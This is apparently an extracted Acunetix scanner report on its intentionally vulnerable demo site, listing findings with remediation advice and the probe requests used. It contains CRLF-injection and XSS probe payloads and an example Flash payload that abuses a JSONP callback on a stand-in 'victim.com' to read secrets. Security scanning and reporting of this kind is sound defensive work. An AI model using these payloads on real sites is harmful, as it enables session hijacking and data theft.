This file was found using the pattern ${fileName}.zip.Original filename: index.phpSource code pattern found: <?PHP require_once("database_connect.php"); ?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <title>Home of WASP Art</title><link rel="stylesheet" href="style.css" type="text/css"><script language="JavaScript" type="text/JavaScript"></script> </head><body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"><div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> <h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6> <div id="globalNav"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> </div> </div>  <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for WASP.</h3> </div></div> <div id="navBar"> <div id="search"> <form action="search.php" method="post"> <label>search art</label>

<input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <?PHP if (isset($_COOKIE["login"]))echo '<li><a href="../logout.php">Logout</a>'; ?></li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p><img src="images/add.jpg" alt="" width="107" height="66"></p> </div> </div>  <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="redir.php?r=index.php">Site Map</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:[email protected]">Contact Us</a> |©2004 Acunetix Ltd </div> <br> </div></body></html>

GET /index.zip HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

CRLF injection/HTTP response splitting (verified)

MediumSeverity

ValidationType

Scripting (CRLF_Injection.script)Reported by module

Description

This script is possibly vulnerable to CRLF injection attacks. HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user inputis injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTPheaders structure.HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cachepoisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). Theattacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted bythe target as two HTTP responses instead of one response.

Impact

Is it possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookiesor HTML code. This may conduct to vulnerabilities like XSS (cross-site scripting) or session fixation.

Recommendation

You need to restrict CR(0x13) and LF(0x10) from the user input or properly encode the output in order to prevent theinjection of custom HTTP headers.

References

Acunetix CRLF Injection Attack

Introduction to HTTP Response Splitting

Whitepaper - HTTP Response Splitting

Affected items

/redir.php

Details

URL encoded GET input r was set to ACUSTART ACUENDAdditional details: Source file: /hj/var/www//redir.php line: 3

GET /redir.php?r=ACUSTART%0d%0aACUEND HTTP/1.1












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


http://www.acunetix.com/websitesecurity/crlf-injection.htm

http://www.securiteam.com/securityreviews/5WP0E2KFGK.html

http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

Cross domain data hijacking

MediumSeverity

ConfigurationType

Scripting (XSS.script)Reported by module

Description

This page is possibly vulnerable to Cross domain data hijacking. If an attacker can create/upload a malicious Flash(SWF) file or control the top part of any page he can perform an attack known as Cross domain data hijacking. TheContent-Type of the response doesn't matter. If the file is embedded using an <object> tag, it will be executed as a Flashfile as long as the content of the file looks like a valid Flash file. Here is the attack scenario: - An attacker creates a malicious Flash (SWF) file- The attacker changes the file extension to JPG- The attacker uploads the file to victim.com- The attacker embeds the file on attacker.com using an tag with type "application/x-shockwave-flash"- The victim visits attacker.com, loads the file as embedded with the tag- The attacker can now send and receive arbitrary requests to victim.com using the victims session- The attacker sends a request to victim.com and extracts the CSRF token from the response There are many ways to perform this attack. The attacker doesn't need to upload a file. The only requirement is that anattacker can control the data on a location of the target domain. One way is to abuse a JSONP API. Usually, the attackercan control the output of a JSONP API endpoint by changing the callback parameter. However, if an attacker uses anentire Flash file as callback, we can use it just like we would use an uploaded file in this attack. A payload could look like this: <object style="height:1px;width:1px;"data="http://victim.com/user/jsonp?callback=CWS%07%0E000x%9C%3D%8D1N%C3%40%10E%DF%AE%8D%BDI%08%29%D3%40%1D%A0%A2%05%09%11%89HiP%22%05D%8BF%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X%3B%21S%8C%FE%CC%9B%F9%FF%AA%CB7Jq%AF%7F%ED%F2%2E%F8%01%3E%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%AC%2C%9F%A5%28%B1%EB%89T%C2Jj%29%93%22%DBT7%24%9C%8FH%CBD6%29%A3%0Bx%29%AC%AD%D8%92%FB%1F%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b%5F%26%1C%9F5%20h%F1%D1g%0F%14%C1%0A%5Ds%8D%8B0Q%A8L%3C%9B6%D4L%BD%5F%A8w%7E%9D%5B%17%F3%2F%5B%DCm%7B%EF%CB%EF%E6%8D%3An%2D%FB%B3%C3%DD%2E%E3d1d%EC%C7%3F6%CD0%09" type="application/x-shockwave-flash" allowscriptaccess="always"flashvars="c=alert&u=http://victim.com/secret_file.txt"></object>

Impact

An attacker can read any secrets (such as CSRF tokens) from the affected domain.

Recommendation

For file uploads: It is recommended to check the file's content to have the correct header and format. If possible, use"Content-Disposition: attachment; filename=Filename.Extension;" header for the files that do not need to be served in theweb browser. Isolating the domain of the uploaded files is also a good solution as long as the crossdomain.xml file of themain website does not include the isolated domain. For other cases: For JSONP abuses or other cases when the attacker control the top part of the page, you need toperform proper input filtering to protect against this type of issues.

References

Cross Domain Data Hijacking

The pitfalls of allowing file uploads on your website

Affected items

/hpp/params.php


https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/

http://labs.detectify.com/post/86302927946/the-lesser-known-pitfalls-of-allowing-file-uploads

Details

URL encoded GET input p was set toCWS%07%0e000x%9c=%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP"%05D%8bF%8e%0bG%26%1b%d9%8e%117%a0%a2%dc%82%8a%1br%04X;!S%8c%fe%cc%9b%f9%ff%aa%cb7Jq%af%7f%ed%f2.%f8%01>%9e%18p%c9c%9al%8b%aczG%f2%dc%beM%ec%abdkj%1e%ac%2c%9f%a5(%b1%eb%89T%c2Jj)%93"%dbT7%24%9c%8fH%cbD6)%a3%0bx)%ac%ad%d8%92%fb%1f%5c%07C%ac%7c%80Q%a7Nc%f4b%e8%fa%98%20b_%26%1c%9f5%20h%f1%d1g%0f%14%c1%0a]s%8d%8b0Q%a8L<%9b6%d4L%bd_%a8w%7e%9d[%17%f3/ ... (line truncated)

(line truncated)

...S%07%0e000x%9c=%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP"%05D%8b

F%8e%0bG%26%1b%d9%8e%117%a0%a2%dc%82%8a%1br%04X;!S%8c%fe%cc%9b%f9%ff%aa%cb7Jq%af%7f%ed%f

2.%f8%01>%9e%18p%c9c%9al%8b%aczG%f2%dc%beM%ec%abdkj%1e%ac%2c%9f%a5(%b1%eb%89T%c2Jj)%93"%

dbT7%24%9c%8fH%cbD6)%a3%0bx)%ac%ad%d8%92%fb%1f%5c%07C%ac%7c%80Q%a7Nc%f4b%e8%fa%98%20b_%2

6%1c%9f5%20h%f1%d1g%0f%14%c1%0a]s%8d%8b0Q%a8L<%9b6%d4L%bd_%a8w%7e%9d[%17%f3/[%dcm{%ef%cb

%ef%e6%8d:n-%fb%b3%c3%dd.%e3d1d%ec%c7%3f6%cd0%09&pp=12 HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/hpp/params.php

Details

URL encoded GET input p was set toCWS%07%0e000x%9c=%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP"%05D%8bF%8e%0bG%26%1b%d9%8e%117%a0%a2%dc%82%8a%1br%04X;!S%8c%fe%cc%9b%f9%ff%aa%cb7Jq%af%7f%ed%f2.%f8%01>%9e%18p%c9c%9al%8b%aczG%f2%dc%beM%ec%abdkj%1e%ac%2c%9f%a5(%b1%eb%89T%c2Jj)%93"%dbT7%24%9c%8fH%cbD6)%a3%0bx)%ac%ad%d8%92%fb%1f%5c%07C%ac%7c%80Q%a7Nc%f4b%e8%fa%98%20b_%26%1c%9f5%20h%f1%d1g%0f%14%c1%0a]s%8d%8b0Q%a8L<%9b6%d4L%bd_%a8w%7e%9d[%17%f3/ ... (line truncated)

(line truncated)

...WS%07%0e000x%9c=%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP"%05D%8

bF%8e%0bG%26%1b%d9%8e%117%a0%a2%dc%82%8a%1br%04X;!S%8c%fe%cc%9b%f9%ff%aa%cb7Jq%af%7f%ed%

f2.%f8%01>%9e%18p%c9c%9al%8b%aczG%f2%dc%beM%ec%abdkj%1e%ac%2c%9f%a5(%b1%eb%89T%c2Jj)%93"

%dbT7%24%9c%8fH%cbD6)%a3%0bx)%ac%ad%d8%92%fb%1f%5c%07C%ac%7c%80Q%a7Nc%f4b%e8%fa%98%20b_%

26%1c%9f5%20h%f1%d1g%0f%14%c1%0a]s%8d%8b0Q%a8L<%9b6%d4L%bd_%a8w%7e%9d[%17%f3/[%dcm{%ef%c

b%ef%e6%8d:n-%fb%b3%c3%dd.%e3d1d%ec%c7%3f6%cd0%09&pp=1 HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


Cross site scripting (content-sniffing)

MediumSeverity

ValidationType

Scripting (XSS.script)Reported by module

Description

This type of XSS can only be triggered on (and affects) content sniffing browsers.This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually inthe form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it willexecute the script in the user context allowing the attacker to access any cookies or session tokens retained by thebrowser.

Impact


Recommendation


References




OWASP PHP Top 5





Affected items

/showimage.php

Details

URL encoded GET input file was set to 1'"()&%<acx><ScRiPt >7CQV(9897)</ScRiPt>

GET /showimage.php?file=1'"()%26%25<acx><ScRiPt%20>7CQV(9897)</ScRiPt> HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/showimage.php

Details

URL encoded GET input file was set to ./pictures/4.jpg'"()&%<acx><ScRiPt >xGEL(9315)</ScRiPt>

GET

/showimage.php?file=./pictures/4.jpg'"()%26%25<acx><ScRiPt%20>xGEL(9315)</ScRiPt>&size=1

60 HTTP/1.1


Request headers


















Chrome/41.0.2228.0 Safari/537.21

Accept: */*


Directory listing

MediumSeverity

InformationType

Scripting (Directory_Listing.script)Reported by module

Description

The web server is configured to display the list of files contained in this directory. This is not recommended because thedirectory may contain files that are not normally exposed through links on the web site.

Impact

A user can view a list of all files from this directory possibly exposing sensitive information.

Recommendation

You should make sure the directory does not contain sensitive information or you may want to restrict directory listingsfrom the web server configuration.

References

Directory Listing and Information Disclosure

Affected items

/.idea

Details

Pattern found: <title>Index of /.idea/</title>

GET /.idea/ HTTP/1.1

Pragma: no-cache

Cache-Control: no-cache

Referer: http://testphp.vulnweb.com/



Acunetix-Aspect-Queries: aspectalerts









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/.idea/scopes

Details

Pattern found: <title>Index of /.idea/scopes/</title>

GET /.idea/scopes/ HTTP/1.1

Pragma: no-cache













Request headers


http://www.acunetix.com/blog/web-security-zone/directory-listing-information-disclosure/


Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/_mmServerScripts

Details

Pattern found: <title>Index of /_mmServerScripts/</title>

GET /_mmServerScripts/ HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/admin

Details

Pattern found: <title>Index of /admin/</title>

GET /admin/ HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/Connections

Details

Pattern found: <title>Index of /Connections/</title>

GET /Connections/ HTTP/1.1

Pragma: no-cache











Request headers





Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/CVS

Details

Pattern found: <title>Index of /CVS/</title>

GET /CVS/ HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/Flash

Details

Pattern found: <title>Index of /Flash/</title>

GET /Flash/ HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/Flash/




Cookie: login=test%2Ftest





Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/images

Details

Pattern found: <title>Index of /images/</title>

GET /images/ HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/images/









Chrome/41.0.2228.0 Safari/537.21

Request headers


Accept: */*

/Mod_Rewrite_Shop/images

Details

Pattern found: <title>Index of /Mod_Rewrite_Shop/images/</title>

GET /Mod_Rewrite_Shop/images/ HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/pictures

Details

Pattern found: <title>Index of /pictures/</title>

GET /pictures/ HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/Templates

Details

Pattern found: <title>Index of /Templates/</title>

GET /Templates/ HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/Templates/









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/wvstests


Details

Pattern found: <title>Index of /wvstests/</title>

GET /wvstests/ HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/wvstests/pmwiki_2_1_19

Details

Pattern found: <title>Index of /wvstests/pmwiki_2_1_19/</title>

GET /wvstests/pmwiki_2_1_19/ HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/wvstests/pmwiki_2_1_19/scripts

Details

Pattern found: <title>Index of /wvstests/pmwiki_2_1_19/scripts/</title>

GET /wvstests/pmwiki_2_1_19/scripts/ HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


Error message on page

MediumSeverity

ValidationType

Scripting (Text_Search_File.script)Reported by module

Description

This page contains an error/warning message that may disclose sensitive information. The message can also contain thelocation of the file that produced the unhandled exception. This may be a false positive if the error message is found in documentation pages.

Impact

The error messages may disclose sensitive information. This information can be used to launch further attacks.

Recommendation

Review the source code for this script.

References

PHP Runtime Configuration

Affected items


Details

Pattern found: <b>Warning</b>: mysql_fetch_array() expects parameter 1 to be resource, boolean given in<b>/hj/var/www//AJAX/infoartist.php</b> on line <b>2</b><br />

GET /AJAX/infoartist.php HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/AJAX/index.php












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/AJAX/infocateg.php

Details

Pattern found: <b>Warning</b>: mysql_fetch_array() expects parameter 1 to be resource, boolean given in<b>/hj/var/www//AJAX/infocateg.php</b> on line <b>2</b><br />

GET /AJAX/infocateg.php HTTP/1.1

Pragma: no-cache










Request headers


http://www.php.net/manual/en/errorfunc.configuration.php#ini.display-errors





Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/AJAX/infotitle.php

Details

Pattern found: <b>Warning</b>: mysql_fetch_array() expects parameter 1 to be resource, boolean given in<b>/hj/var/www//AJAX/infotitle.php</b> on line <b>2</b><br />

GET /AJAX/infotitle.php HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/Connections/DB_Connection.php

Details

Pattern found: Fatal error

GET /Connections/DB_Connection.php HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/pictures/path-disclosure-unix.html

Details

Pattern found: <b>Warning</b>: Sablotron error on line 1: XML parser error 3: no element found in<b>/usr/local/etc/httpd/htdocs2/destination-ce/destinationce/system/class/xsltTransform.class.php</b> on line<b>70</b><br />

GET /pictures/path-disclosure-unix.html HTTP/1.1

Pragma: no-cache






Request headers










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/secured/database_connect.php

Details

Pattern found: <b>Warning</b>: mysql_connect(): Access denied for user 'wauser'@'localhost' (using password: NO) in<b>/hj/var/www//secured/database_connect.php</b> on line <b>2</b><br />

GET /secured/database_connect.php HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


HTML form without CSRF protection

MediumSeverity

InformationalType

CrawlerReported by module

Description

This alert may be a false positive, manual confirmation is required.Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is atype of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the websitetrusts. Acunetix WVS found a HTML form with no apparent CSRF protection implemented. Consult details for more informationabout the affected HTML form.

Impact

An attacker may force the users of a web application to execute actions of the attacker''s choosing. A successful CSRFexploit can compromise end user data and operation in case of normal user. If the targeted end user is the administratoraccount, this can compromise the entire web application.

Recommendation

Check if this form requires CSRF protection and implement CSRF countermeasures if necessary.

Affected items

/

Details

Form name: <empty>Form action: http://testphp.vulnweb.com/search.php?test=queryForm method: POST Form inputs: - searchFor [Text]- goButton [Submit]

GET / HTTP/1.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8


Chrome/41.0.2228.0 Safari/537.21

Connection: Keep-Alive


Accept-Language: en-US,*


Request headers

/comment.php (7aae61e4ef757b75f29861b71d32976e)

Details

Form name: fCommentForm action: http://testphp.vulnweb.com/comment.phpForm method: POST Form inputs: - name [Text]- comment [TextArea]- Submit [Submit]- phpaction [Hidden]

GET /comment.php?aid=1 HTTP/1.1

Pragma: no-cache


Request headers


Referer: http://testphp.vulnweb.com/artists.php









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/hpp (fbc1d56ba0737d3fa577aa5a19c9fd49)

Details

Form name: <empty>Form action: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12Form method: GET Form inputs: - aaaa [Submit]

GET /hpp/?pp=12 HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/hpp/









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/signup.php

Details

Form name: form1Form action: http://testphp.vulnweb.com/secured/newuser.phpForm method: POST Form inputs: - uuname [Text]- upass [Password]- upass2 [Password]- urname [Text]- ucc [Text]- uemail [Text]- uphone [Text]- uaddress [TextArea]- signup [Submit]

GET /signup.php HTTP/1.1

Pragma: no-cache


Referer: http://testphp.vulnweb.com/login.php







Request headers




Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/userinfo.php (9d1db3f4d16732c9716e14a3e959fa2d)

Details

Form name: form1Form action: http://testphp.vulnweb.com/userinfo.phpForm method: POST Form inputs: - urname [Text]- ucc [Text]- uemail [Text]- uphone [Text]- uaddress [TextArea]- update [Submit]




Origin: http://testphp.vulnweb.com


Chrome/41.0.2228.0 Safari/537.21


Content-Length: 20





uname=test&pass=test

Request headers


HTTP parameter pollution

MediumSeverity

ConfigurationType

Scripting (HTTP_Parameter_Pollution.script)Reported by module

Description

This script is possibly vulnerable to HTTP Parameter Pollution attacks. HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If the web applicationdoes not properly sanitize the user input, a malicious user can compromise the logic of the application to perform eitherclientside or server-side attacks.

Impact

The impact depends on the affected web application. An attacker could - Override existing hardcoded HTTP parameters- Modify the application behaviors- Access and, potentially exploit, uncontrollable variables- Bypass input validation checkpoints and WAFs rules

Recommendation

The application should properly sanitize user input (URL encode) to protect against this vulnerability.

References

HTTP Parameter Pollution

Affected items

/hpp/

Details

URL encoded GET input pp was set to 12&n998091=v937951Parameter precedence: last occurrenceAffected link: params.php?p=valid&pp=12&n998091=v937951Affected parameter: p=valid

GET /hpp/?pp=12%26n998091=v937951 HTTP/1.1









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/hpp/index.php

Details

URL encoded GET input pp was set to 12&n990103=v954437Parameter precedence: last occurrenceAffected link: params.php?p=valid&pp=12&n990103=v954437Affected parameter: p=valid

GET /hpp/index.php?pp=12%26n990103=v954437 HTTP/1.1







Request headers


https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf



Chrome/41.0.2228.0 Safari/537.21

Accept: */*


Insecure crossdomain.xml file

MediumSeverity

ConfigurationType

Scripting (Crossdomain_XML.script)Reported by module

Description

The browser security model normally prevents web content from one domain from accessing data from another domain.This is commonly known as the "same origin policy". URL policy files grant cross-domain permissions for reading data.They permit operations that are not permitted by default. The URL policy file is located, by default, in the root directory ofthe target server, with the name crossdomain.xml (for example, at www.example.com/crossdomain.xml). When a domain is specified in crossdomain.xml file, the site declares that it is willing to allow the operators of anyservers in that domain to obtain any document on the server where the policy file resides. The crossdomain.xml filedeployed on this website opens the server to all domains (use of a single asterisk "*" as a pure wildcard is supported) likeso: <cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>This practice is suitable for public servers, but should not be used for sites located behind a firewall because it couldpermit access to protected areas. It should not be used for sites that require authentication in the form of passwords orcookies. Sites that use the common practice of authentication based on cookies to access private or user-specific datashould be especially careful when using cross-domain policy files.

Impact

Using an insecure cross-domain policy file could expose your site to various attacks.

Recommendation

Carefully evaluate which sites will be allowed to make cross-domain calls. Consider network topology and anyauthentication mechanisms that will be affected by the configuration or implementation of the cross-domain policy.

References

Cross-domain policy file usage recommendations for Flash Player

Cross-domain policy files

Affected items

Web Server

Details

The crossdomain.xml file is located at /crossdomain.xml

GET /crossdomain.xml HTTP/1.1





Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


http://www.adobe.com/devnet/flashplayer/articles/cross_domain_policy.html

http://blogs.adobe.com/stateofsecurity/2007/07/crossdomain_policy_files_1.html

JetBrains .idea project directory

MediumSeverity

ValidationType

Scripting (JetBrains_Idea_Project_Directory.script)Reported by module

Description

The .idea directory contains a set of configuration files (.xml) for your project. These configuration files containinformation core to the project itself, such as names and locations of its component modules, compiler settings, etc. Ifyou've defined a data source the file dataSources.ids contains information for connecting to the database andcredentials. The workspace.xml file stores personal settings such as placement and positions of your windows, your VCSand History settings, and other data pertaining to the development environment. It also contains a list of changed filesand other sensitive information. These files should not be present on a production system.

Impact

These files may expose sensitive information that may help an malicious user to prepare more advanced attacks.

Recommendation

Remove these files from production systems or restrict access to the .idea directory. To deny access to all the .ideafolders you need to add the following lines in the appropriate context (either global config, or vhost/directory, or from.htaccess): <Directory ~ "\.idea">Order allow,denyDeny from all</Directory>

References

Apache Tips & Tricks: Deny access to some folders

Affected items

/

Details

workspace.xml project file found at : /.idea/workspace.xmlPattern found: <project version="4">

GET /.idea/workspace.xml HTTP/1.1









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


http://www.ducea.com/2006/08/11/apache-tips-tricks-deny-access-to-some-folders/


MediumSeverity

ConfigurationType

Scripting (PHPInfo.script)Reported by module

Description

The PHP configuration directive allow_url_fopen is enabled. When enabled, this directive allows data retrieval fromremote locations (web site or FTP server). A large number of code injection vulnerabilities reported in PHP-based webapplications are caused by the combination of enabling allow_url_fopen and bad input filtering. allow_url_fopen is enabled by default.

Impact

Application dependant - possible remote file inclusion.

Recommendation

You can disable allow_url_fopen from php.ini or .htaccess. php.iniallow_url_fopen = 'off' .htaccessphp_flag allow_url_fopen off

References

Runtime Configuration

Affected items

/secured/phpinfo.php

Details

This vulnerability was detected using the information from phpinfo() page /secured/phpinfo.phpallow_url_fopen: On

GET /secured/phpinfo.php HTTP/1.1









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


http://www.php.net/manual/en/filesystem.configuration.php

PHP errors enabled

MediumSeverity

ConfigurationType


Description

The display_errors directive determines whether error messages should be sent to the browser. These messagesfrequently contain sensitive information about your web application environment, and should never be presented tountrusted sources. display_errors is on by default.

Impact

Possible information disclosure.

Recommendation

You can disable display_errors from php.ini or .htaccess. php.inidisplay_errors = 'off'log_errors = 'on' .htaccessphp_flag display_errors offphp_flag log_errors on

References


Affected items


Details

This vulnerability was detected using the information from phpinfo() page /secured/phpinfo.phpdisplay_errors: On










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

Web Server

Details

Current setting is : display_errors = 1


http://www.php.net/manual/en/errorfunc.configuration.php#ini.error-reporting

PHP open_basedir is not set

MediumSeverity

ConfigurationType


Description

The open_basedir configuration directive will limit the files that can be opened by PHP to the specified directory-tree.When a script tries to open a file with, for example, fopen() or gzopen(), the location of the file is checked. When the fileis outside the specified directory-tree, PHP will refuse to open it. open_basedir is a good protection against remote fileinclusion vulnerabilities. For a remote attacker it is not possible to break out of the open_basedir restrictions if he is onlyable to inject the name of a file to be included. Therefore the number of files he will be able to include with such a localfile include vulnerability is limited.

Impact

Application dependant - possible remote code inclusion.

Recommendation

You can set open_basedir from php.ini php.iniopen_basedir = your_application_directory

References

Description of core php.ini directives

Affected items


Details

This vulnerability was detected using the information from phpinfo() page /secured/phpinfo.phpopen_basedir: no value










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


http://php.net/ini.core

PHP session.use_only_cookies disabled

MediumSeverity

ConfigurationType


Description

When use_only_cookies is disabled, PHP will pass the session ID via the URL. This makes the application morevulnerable to session hijacking attacks. Session hijacking is basically a form of identity theft wherein a hackerimpersonates a legitimate user by stealing his session ID. When the session token is transmitted in a cookie, and therequest is made on a secure channel (that is, it uses SSL), the token is secure.

Impact

Application dependant - possible session hijacking.

Recommendation

You can enabled session.use_only_cookies from php.ini or .htaccess. php.inisession.use_only_cookies = 'on' .htaccessphp_flag session.use_only_cookies on

References


Affected items


Details

This vulnerability was detected using the information from phpinfo() page /secured/phpinfo.phpsession.use_only_cookies: On










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


http://www.php.net/session.configuration

PHPinfo page

MediumSeverity

ValidationType


Description

PHPinfo page has been found in this directory. The PHPinfo page outputs a large amount of information about thecurrent state of PHP. This includes information about PHP compilation options and extensions, the PHP version, serverinformation and environment (if compiled as a module), the PHP environment, OS version information, paths, master andlocal values of configuration options, HTTP headers, and the PHP License.

Impact

This file may expose sensitive information that may help an malicious user to prepare more advanced attacks.

Recommendation

Remove the file from production systems.

References

PHP phpinfo

Affected items


Details

phpinfo() page found at : /secured/phpinfo.php










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


http://www.php.net/manual/en/function.phpinfo.php

PHPinfo page found

MediumSeverity

ValidationType


Description

This script is using phpinfo() function. This function outputs a large amount of information about the current state of PHP.This includes information about PHP compilation options and extensions, the PHP version, server information andenvironment (if compiled as a module), the PHP environment, OS version information, paths, master and local values ofconfiguration options, HTTP headers, and the PHP License.

Impact


Recommendation

Remove the file from production systems.

References

PHP phpinfo

Affected items


Details

Pattern found: <title>phpinfo()</title>


Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


http://www.php.net/manual/en/function.phpinfo.php

Source code disclosure

MediumSeverity

ValidationType


Description

Looks like the source code for this script is available. This check is using pattern matching to determine if server sidetags are found in the file. In some cases this alert may generate false positives.

Impact

An attacker can gather sensitive information (database connection strings, application logic) by analyzing the sourcecode. This information can be used to conduct further attacks.

Recommendation

Remove this file from your website or change its permissions to remove access.

References

Source Code Disclosure

Affected items

/index.bak

Details

Pattern found: <?PHP require_once("database_connect.php"); ?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <title>Home of WASP Art</title><link rel="stylesheet" href="style.css" type="text/css"><script language="JavaScript" type="text/JavaScript"><!--function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.re ...

GET /index.bak HTTP/1.1

Pragma: no-cache














Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/pictures/wp-config.bak

Details

Pattern found: <?php// ** MySQL settings ** //define('DB_NAME', 'wp265as'); // The name of the databasedefine('DB_USER', 'root'); // Your MySQL usernamedefine('DB_PASSWORD', ''); // ...and passworddefine('DB_HOST', 'localhost'); // 99% chance you won't need to change this valuedefine('DB_CHARSET', 'utf8');define('DB_COLLATE', ''); // Change each KEY to a different unique phrase. You won't have to remember the phrases later,// so make them long and complicated. You can visit http://api.wordpress.org/secret-key/1.1/// to get keys generated for you, or just make something up. Each key should have a different phrase.define('AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phrase.define('SECURE_AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phrase.define('LOGGED_IN_KEY', 'put your unique phrase here'); // Change this to a unique phrase. // You can have multiple installations in one database if you give each a unique prefix$table_prefix = 'w ...

GET /pictures/wp-config.bak HTTP/1.1

Pragma: no-cache




